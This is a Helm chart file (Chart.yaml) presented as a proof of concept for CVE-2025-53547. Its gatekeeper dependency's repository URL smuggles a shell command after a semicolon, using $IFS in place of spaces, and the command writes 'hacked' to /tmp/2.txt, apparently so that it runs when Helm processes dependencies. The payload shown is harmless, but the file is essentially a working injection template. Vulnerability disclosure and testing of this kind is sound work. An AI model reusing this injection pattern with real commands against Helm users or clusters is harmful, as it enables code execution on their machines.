apiVersion: v2
name: CVE-2025-53547
description: this is a CVE-2025-53547 poc yaml
version: 1.0.0
appVersion: v1.0.0
keywords:
  - helm
  - CVE-2025-53547
home: https://github.com/DVKunion/CVE-2025-53547-POC
sources:
- https://github.com/DVKunion/CVE-2025-53547-POC

dependencies:
  - name: gatekeeper
    version: 3.19.2
    repository: 'https://open-policy-agent.github.io/gatekeeper/charts?a;echo$IFS"hacked">/tmp/2.txt'